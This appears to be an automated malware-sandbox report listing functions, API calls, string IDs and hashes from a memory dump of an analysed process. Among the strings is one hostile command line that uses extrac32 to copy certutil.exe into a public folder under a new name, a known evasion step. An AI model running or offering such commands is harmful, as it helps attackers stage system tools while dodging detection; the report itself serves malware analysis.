                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_7ff7ab120000_alpha.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: iswdigit$_errnoiswalphawcschrwcstol
                                                                                                          • String ID: +-~!$APerformUnaryOperation: '%c'
                                                                                                          • API String ID: 2348642995-441775793
                                                                                                          • Opcode ID: 3043d5b8b3736d8e68c05dd1a897401147fff5d71c47df5c8b899d9aaf2ce369
                                                                                                          • Instruction ID: 7c007406909481bc28d7e4f5945bc1704bfdc123b3062a511cea8045458d3f71
                                                                                                          • Opcode Fuzzy Hash: 3043d5b8b3736d8e68c05dd1a897401147fff5d71c47df5c8b899d9aaf2ce369
                                                                                                          • Instruction Fuzzy Hash: 8A714262D0EA46C5E7A66F19E45017DF7A0FB45B88BD69131DA4E062B8FF3C9488C720
                                                                                                          Function 00007FF7AB129400 Relevance: 19.4, APIs: 9, Strings: 2, Instructions: 161COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.1470461110.00007FF7AB121000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7AB120000, based on PE: true
                                                                                                          • Associated: 00000004.00000002.1470443280.00007FF7AB120000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.1470505070.00007FF7AB152000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.1470526099.00007FF7AB15D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.1470526099.00007FF7AB161000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.1470526099.00007FF7AB16F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.1470595606.00007FF7AB179000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_7ff7ab120000_alpha.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: memset$ErrorInformationLastVolume_wcsicmptowupper
                                                                                                          • String ID: FAT$~
                                                                                                          • API String ID: 2238823677-1832570214
                                                                                                          • Opcode ID: 9870e3df3003cca21a2b5bb6f1f08ea82d43fbeeb1162d01b560e5e2cc2d055c
                                                                                                          • Instruction ID: 96403666c4749ba540662d175d16a6eb545c3ce6f73359de305acbeb7d602438
                                                                                                          • Opcode Fuzzy Hash: 9870e3df3003cca21a2b5bb6f1f08ea82d43fbeeb1162d01b560e5e2cc2d055c
                                                                                                          • Instruction Fuzzy Hash: 83719272609BC1C9EB629F28E8502E9B7A4FB45788F814135DA4D4B778EF38D249C710
                                                                                                          Function 00007FF7AB12D840 Relevance: 18.4, APIs: 12, Instructions: 444memoryCOMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,?,?,?,?,?,?,00000010,?,00000000,0000000E,00000025,?,00007FF7AB12FE2A), ref: 00007FF7AB12D884
                                                                                                          • HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,?,?,?,?,?,?,00000010,?,00000000,0000000E,00000025,?,00007FF7AB12FE2A), ref: 00007FF7AB12D89D
                                                                                                          • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,?,?,?,?,?,?,00000010,?,00000000,0000000E,00000025,?,00007FF7AB12FE2A), ref: 00007FF7AB12D94D
                                                                                                          • HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,?,?,?,?,?,?,00000010,?,00000000,0000000E,00000025,?,00007FF7AB12FE2A), ref: 00007FF7AB12D964
                                                                                                          • _wcsnicmp.MSVCRT ref: 00007FF7AB12DB89
                                                                                                          • wcstol.MSVCRT ref: 00007FF7AB12DBDF
                                                                                                          • wcstol.MSVCRT ref: 00007FF7AB12DC63
                                                                                                          • memmove.MSVCRT ref: 00007FF7AB12DD33
                                                                                                          • memmove.MSVCRT ref: 00007FF7AB12DE9A
                                                                                                          • longjmp.MSVCRT(?,?,?,?,?,?,?,?,?,00000010,?,00000000,0000000E,00000025,?,00007FF7AB12FE2A), ref: 00007FF7AB12DF1F
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.1470461110.00007FF7AB121000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7AB120000, based on PE: true
                                                                                                          • Associated: 00000004.00000002.1470443280.00007FF7AB120000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.1470505070.00007FF7AB152000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.1470526099.00007FF7AB15D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.1470526099.00007FF7AB161000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.1470526099.00007FF7AB16F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.1470595606.00007FF7AB179000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_7ff7ab120000_alpha.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Heap$AllocProcessmemmovewcstol$_wcsnicmplongjmp
                                                                                                          • String ID:
                                                                                                          • API String ID: 1051989028-0
                                                                                                          • Opcode ID: 64565f03666b4bb772596797247e6bb6fdde89d50adaa5f7e3853eb5f84ddd48
                                                                                                          • Instruction ID: 8ba498fae1b2371dcddc441a8f9e9a99b3acfe04663ae6fb0efa6d630bfb9925
                                                                                                          • Opcode Fuzzy Hash: 64565f03666b4bb772596797247e6bb6fdde89d50adaa5f7e3853eb5f84ddd48
                                                                                                          • Instruction Fuzzy Hash: EC028136A0AB45C2EA26AF18F440279B6A1FB45B98F964635DA8D037F4DF3CD461C720
                                                                                                          Function 00007FF7AB1286B0 Relevance: 18.1, APIs: 8, Strings: 4, Instructions: 138memoryCOMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.1470461110.00007FF7AB121000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7AB120000, based on PE: true
                                                                                                          • Associated: 00000004.00000002.1470443280.00007FF7AB120000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.1470505070.00007FF7AB152000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.1470526099.00007FF7AB15D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.1470526099.00007FF7AB161000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.1470526099.00007FF7AB16F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.1470595606.00007FF7AB179000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_7ff7ab120000_alpha.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Heap$_wcsicmp$AllocProcess
                                                                                                          • String ID: DISABLEDELAYEDEXPANSION$DISABLEEXTENSIONS$ENABLEDELAYEDEXPANSION$ENABLEEXTENSIONS
                                                                                                          • API String ID: 3223794493-3086019870
                                                                                                          • Opcode ID: d222a0f06bbbc582554831b5995f9d518337be47592992ae4180831db5f06540
                                                                                                          • Instruction ID: 1e7c90a199c01d1893acf3883e05c2c2c04aa47bd4dae62dffb0b5389bba23d5
                                                                                                          • Opcode Fuzzy Hash: d222a0f06bbbc582554831b5995f9d518337be47592992ae4180831db5f06540
                                                                                                          • Instruction Fuzzy Hash: 2D518135A0A742C6EA56AB1DF450179BBA0FF49B98F968234C95E033B4EF3DE445C720
                                                                                                          Function 00007FF7AB132B94 Relevance: 18.1, APIs: 6, Strings: 6, Instructions: 110COMMON
                                                                                                          Download Yara Rule
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.1470461110.00007FF7AB121000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7AB120000, based on PE: true
                                                                                                          • Associated: 00000004.00000002.1470443280.00007FF7AB120000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.1470505070.00007FF7AB152000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.1470526099.00007FF7AB15D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.1470526099.00007FF7AB161000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.1470526099.00007FF7AB16F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.1470595606.00007FF7AB179000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_7ff7ab120000_alpha.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID: EQU$GEQ$GTR$LEQ$LSS$NEQ
                                                                                                          • API String ID: 0-3124875276
                                                                                                          • Opcode ID: 27546f26981fd3a6242742626cf9575fc19742bdde1af1eb23768a0abe577f48
                                                                                                          • Instruction ID: b64bd52a78cd404e0ba2859732af14aeaa9009bac675468b1eac89fd778c7f9a
                                                                                                          • Opcode Fuzzy Hash: 27546f26981fd3a6242742626cf9575fc19742bdde1af1eb23768a0abe577f48
                                                                                                          • Instruction Fuzzy Hash: 45517120A0E64381FB9A7F2DF4402B8B690AF4574CFD68135C65E462B4EF3CA44C87B0
                                                                                                          Function 00007FF7AB14BFEC Relevance: 17.9, APIs: 3, Strings: 7, Instructions: 444COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                            • Part of subcall function 00007FF7AB1358E4: EnterCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,?,?,00007FF7AB14C6DB), ref: 00007FF7AB1358EF
                                                                                                            • Part of subcall function 00007FF7AB13081C: GetEnvironmentVariableW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0 ref: 00007FF7AB13084E
                                                                                                          • towupper.MSVCRT ref: 00007FF7AB14C1C9
                                                                                                          • GetDriveTypeW.API-MS-WIN-CORE-FILE-L1-1-0 ref: 00007FF7AB14C31C
                                                                                                          • LocalFree.API-MS-WIN-CORE-HEAP-L2-1-0 ref: 00007FF7AB14C5CB
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.1470461110.00007FF7AB121000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7AB120000, based on PE: true
                                                                                                          • Associated: 00000004.00000002.1470443280.00007FF7AB120000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.1470505070.00007FF7AB152000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.1470526099.00007FF7AB15D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.1470526099.00007FF7AB161000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.1470526099.00007FF7AB16F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.1470595606.00007FF7AB179000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_7ff7ab120000_alpha.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: CriticalDriveEnterEnvironmentFreeLocalSectionTypeVariabletowupper
                                                                                                          • String ID: %s $%s>$PROMPT$Unknown$\$extrac32 /C /Y C:\\Windows\\System32\\certutil.exe C:\\Users\\Public\\kn.exe $x
                                                                                                          • API String ID: 2242554020-619615743
                                                                                                          • Opcode ID: 4a922d4c85f00677817b5c761d16b1de45b4041caf2284929607811bb1d70d1e
                                                                                                          • Instruction ID: 51b61ada0616fb2912d8d4d5ff31072aefd02c8469262afc8e608003db75f204
                                                                                                          • Opcode Fuzzy Hash: 4a922d4c85f00677817b5c761d16b1de45b4041caf2284929607811bb1d70d1e
                                                                                                          • Instruction Fuzzy Hash: 1C12B161A0A64281EA66BB1DF44017AE7A0EF44BA8FD64335D95E037F0EF3CE546C720
                                                                                                          Function 00007FF7AB136FB4 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 148COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • memset.MSVCRT ref: 00007FF7AB137013
                                                                                                          • ??_V@YAXPEAX@Z.MSVCRT ref: 00007FF7AB137123
                                                                                                            • Part of subcall function 00007FF7AB131EA0: wcschr.MSVCRT(?,?,?,00007FF7AB12286E,00000000,00000000,00000000,00000000,00000000,0000000A,?,00007FF7AB150D54), ref: 00007FF7AB131EB3
                                                                                                          • GetFullPathNameW.API-MS-WIN-CORE-FILE-L1-1-0 ref: 00007FF7AB13706E
                                                                                                          • wcsncmp.MSVCRT ref: 00007FF7AB1370A5
                                                                                                          • wcsstr.MSVCRT ref: 00007FF7AB13F9DB
                                                                                                          • GetFileAttributesW.API-MS-WIN-CORE-FILE-L1-1-0 ref: 00007FF7AB13FA00
                                                                                                          • GetFileAttributesW.API-MS-WIN-CORE-FILE-L1-1-0 ref: 00007FF7AB13FA5F
                                                                                                            • Part of subcall function 00007FF7AB13823C: FindFirstFileExW.KERNELBASE ref: 00007FF7AB138280
                                                                                                            • Part of subcall function 00007FF7AB13823C: GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00007FF7AB13829D
                                                                                                            • Part of subcall function 00007FF7AB133A0C: FindClose.API-MS-WIN-CORE-FILE-L1-1-0(?,?,?,00007FF7AB14EAC5,?,?,?,00007FF7AB14E925,?,?,?,?,00007FF7AB12B9B1), ref: 00007FF7AB133A56
                                                                                                          • GetDriveTypeW.API-MS-WIN-CORE-FILE-L1-1-0 ref: 00007FF7AB13FA3D
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.1470461110.00007FF7AB121000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7AB120000, based on PE: true
                                                                                                          • Associated: 00000004.00000002.1470443280.00007FF7AB120000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.1470505070.00007FF7AB152000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.1470526099.00007FF7AB15D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.1470526099.00007FF7AB161000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.1470526099.00007FF7AB16F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.1470595606.00007FF7AB179000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_7ff7ab120000_alpha.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: File$AttributesFindmemset$CloseDriveErrorFirstFullLastNamePathTypewcschrwcsncmpwcsstr
                                                                                                          • String ID: \\.\
                                                                                                          • API String ID: 799470305-2900601889
                                                                                                          • Opcode ID: 1d9e630e3dc056cac36988160209897b6a55c82e5470b3b56a9f5e981f117f56
                                                                                                          • Instruction ID: 2a408c0f794547d38104cd1bf3c77778a4f4d13a7a1bd92ee321f3d0369c4a83
                                                                                                          • Opcode Fuzzy Hash: 1d9e630e3dc056cac36988160209897b6a55c82e5470b3b56a9f5e981f117f56
                                                                                                          • Instruction Fuzzy Hash: F551EF32A0AA82C5EBA69F19F4406B9F7E0FB45B48F864535D94E077B4EF3CD5498310
                                                                                                          Function 00007FF7AB128B20 Relevance: 16.8, APIs: 11, Instructions: 254COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.1470461110.00007FF7AB121000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7AB120000, based on PE: true
                                                                                                          • Associated: 00000004.00000002.1470443280.00007FF7AB120000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.1470505070.00007FF7AB152000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.1470526099.00007FF7AB15D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.1470526099.00007FF7AB161000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.1470526099.00007FF7AB16F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.1470595606.00007FF7AB179000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_7ff7ab120000_alpha.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: _wcsicmpwcschr$AttributesErrorFileLastwcsrchr
                                                                                                          • String ID:
                                                                                                          • API String ID: 1944892715-0
                                                                                                          • Opcode ID: b04fd89d1b32d74b41568e07ffd85bc9ccdf1354646f06c8d836b15a263e4c9a
                                                                                                          • Instruction ID: 3ebd3804370bf2151da4c82f5d8c43610e0c120a3cb38b8f0279a25fa2781187
                                                                                                          • Opcode Fuzzy Hash: b04fd89d1b32d74b41568e07ffd85bc9ccdf1354646f06c8d836b15a263e4c9a
                                                                                                          • Instruction Fuzzy Hash: 6EB18661A0B646C6EA66BF19F490179EAA0FF45B88FC64535CA4E473F1EF3DE4448320
                                                                                                          Function 00007FF7AB125458 Relevance: 16.7, APIs: 11, Instructions: 213fileCOMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                            • Part of subcall function 00007FF7AB133578: _get_osfhandle.MSVCRT ref: 00007FF7AB133584
                                                                                                            • Part of subcall function 00007FF7AB133578: GetFileType.API-MS-WIN-CORE-FILE-L1-1-0(?,?,00000014,00007FF7AB1232E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF7AB13359C
                                                                                                            • Part of subcall function 00007FF7AB133578: GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,00000014,00007FF7AB1232E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF7AB1335C3
                                                                                                            • Part of subcall function 00007FF7AB133578: AcquireSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,00000014,00007FF7AB1232E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF7AB1335D9
                                                                                                            • Part of subcall function 00007FF7AB133578: GetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?,00000014,00007FF7AB1232E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF7AB1335ED
                                                                                                            • Part of subcall function 00007FF7AB133578: ReleaseSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,00000014,00007FF7AB1232E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF7AB133602
                                                                                                          • _get_osfhandle.MSVCRT ref: 00007FF7AB1254DE
                                                                                                          • WideCharToMultiByte.API-MS-WIN-CORE-STRING-L1-1-0(?,?,00007FF7AB121F7D), ref: 00007FF7AB12552B
                                                                                                          • WriteFile.API-MS-WIN-CORE-FILE-L1-1-0(?,?,00007FF7AB121F7D), ref: 00007FF7AB12554F
                                                                                                          • _get_osfhandle.MSVCRT ref: 00007FF7AB14345F
                                                                                                          • WriteConsoleW.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?,00007FF7AB121F7D), ref: 00007FF7AB14347E
                                                                                                          • SetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?,00007FF7AB121F7D), ref: 00007FF7AB1434C3
                                                                                                          • _get_osfhandle.MSVCRT ref: 00007FF7AB1434DB
                                                                                                          • WriteConsoleW.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?,00007FF7AB121F7D), ref: 00007FF7AB1434FA
                                                                                                            • Part of subcall function 00007FF7AB1336EC: _get_osfhandle.MSVCRT ref: 00007FF7AB133715
                                                                                                            • Part of subcall function 00007FF7AB1336EC: WideCharToMultiByte.API-MS-WIN-CORE-STRING-L1-1-0 ref: 00007FF7AB133770
                                                                                                            • Part of subcall function 00007FF7AB1336EC: WriteFile.API-MS-WIN-CORE-FILE-L1-1-0 ref: 00007FF7AB133791
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.1470461110.00007FF7AB121000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7AB120000, based on PE: true
                                                                                                          • Associated: 00000004.00000002.1470443280.00007FF7AB120000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.1470505070.00007FF7AB152000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.1470526099.00007FF7AB15D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.1470526099.00007FF7AB161000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.1470526099.00007FF7AB16F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.1470595606.00007FF7AB179000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_7ff7ab120000_alpha.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: _get_osfhandle$ConsoleWrite$File$ByteCharLockModeMultiSharedWide$AcquireHandleReleaseTypewcschr
                                                                                                          • String ID:
                                                                                                          • API String ID: 1356649289-0
                                                                                                          • Opcode ID: 0c4a37dfe8b9f6674b9d741f685a90a2de3626c6216cde8b4183c3294efd6170
                                                                                                          • Instruction ID: aef350adcae6c8477f281f823c263277b3dda1989b282d116914e2e0830a25c0
                                                                                                          • Opcode Fuzzy Hash: 0c4a37dfe8b9f6674b9d741f685a90a2de3626c6216cde8b4183c3294efd6170
                                                                                                          • Instruction Fuzzy Hash: 08919172A0A642C7EB16AF19F440179F6A1FB89B88F8A4135DA4E477B4EF3CD440CB10
                                                                                                          Function 00007FF7AB1486FC Relevance: 16.0, APIs: 6, Strings: 3, Instructions: 226timeCOMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.1470461110.00007FF7AB121000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7AB120000, based on PE: true
                                                                                                          • Associated: 00000004.00000002.1470443280.00007FF7AB120000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.1470505070.00007FF7AB152000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.1470526099.00007FF7AB15D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.1470526099.00007FF7AB161000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.1470526099.00007FF7AB16F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.1470595606.00007FF7AB179000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_7ff7ab120000_alpha.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: LocalTime$ErrorLast_get_osfhandle
                                                                                                          • String ID: %s$/-.$:
                                                                                                          • API String ID: 1644023181-879152773
                                                                                                          • Opcode ID: 52adc4b69c0d6b0cc37f226843e3bc06c06473f0745bac629c27b33a4c267472
                                                                                                          • Instruction ID: 1e0e18a68fccf9bab832f832951af8581289d0aa3bce1b256795ffe6f20ac40e
                                                                                                          • Opcode Fuzzy Hash: 52adc4b69c0d6b0cc37f226843e3bc06c06473f0745bac629c27b33a4c267472
                                                                                                          • Instruction Fuzzy Hash: 6D91C7A2A1A64285EB12AB1CF4501B9EBA0FF84B98FD64135D65E436F4EF3CE545C320
                                                                                                          Function 00007FF7AB14627C Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 95synchronizationCOMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • WaitForSingleObject.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,00000000,00007FF7AB147251), ref: 00007FF7AB14628E
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.1470461110.00007FF7AB121000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7AB120000, based on PE: true
                                                                                                          • Associated: 00000004.00000002.1470443280.00007FF7AB120000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.1470505070.00007FF7AB152000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.1470526099.00007FF7AB15D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.1470526099.00007FF7AB161000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.1470526099.00007FF7AB16F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.1470595606.00007FF7AB179000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_7ff7ab120000_alpha.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: ObjectSingleWait
                                                                                                          • String ID: wil
                                                                                                          • API String ID: 24740636-1589926490
                                                                                                          • Opcode ID: ea3b1f99615cb6da41309659edc9fe07f1318ac417b21432a0effa90e1671882
                                                                                                          • Instruction ID: 28b9f0211b5458fd69f2e1548c03fdcc8f74352d93a95d18ed4f389fa1ff351e
                                                                                                          • Opcode Fuzzy Hash: ea3b1f99615cb6da41309659edc9fe07f1318ac417b21432a0effa90e1671882
                                                                                                          • Instruction Fuzzy Hash: 7A4173B1A0958283F3216B1DF440279B6A1EF8578CFD29271D50E46AB8EF3DE945C721
                                                                                                          Function 00007FF7AB14CDC0 Relevance: 15.8, APIs: 6, Strings: 3, Instructions: 94windowCOMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.1470461110.00007FF7AB121000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7AB120000, based on PE: true
                                                                                                          • Associated: 00000004.00000002.1470443280.00007FF7AB120000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.1470505070.00007FF7AB152000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.1470526099.00007FF7AB15D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.1470526099.00007FF7AB161000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.1470526099.00007FF7AB16F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.1470595606.00007FF7AB179000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_7ff7ab120000_alpha.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: FormatMessage$ByteCharFreeLocalMultiWide_ultoa
                                                                                                          • String ID: $Application$System
                                                                                                          • API String ID: 3377411628-1881496484
                                                                                                          • Opcode ID: 80d38d575318b3867918aa38a6e3db8ef172391286b4c5249a392e05da5dfb20
                                                                                                          • Instruction ID: cf090b0cfd5d17015db820ae1e56e3bc1c588ea57aecd8f301820d5f024d68b6
                                                                                                          • Opcode Fuzzy Hash: 80d38d575318b3867918aa38a6e3db8ef172391286b4c5249a392e05da5dfb20
                                                                                                          • Instruction Fuzzy Hash: 51416772B05A029AE711AB68F4403EDBBA5FB8974CF854235DA4E03B68EF3CD145C750
                                                                                                          Function 00007FF7AB1214E8 Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 64COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.1470461110.00007FF7AB121000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7AB120000, based on PE: true
                                                                                                          • Associated: 00000004.00000002.1470443280.00007FF7AB120000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.1470505070.00007FF7AB152000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.1470526099.00007FF7AB15D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.1470526099.00007FF7AB161000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.1470526099.00007FF7AB16F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.1470595606.00007FF7AB179000.00000002.00000001.01000000.00000004.sdmpDownload File
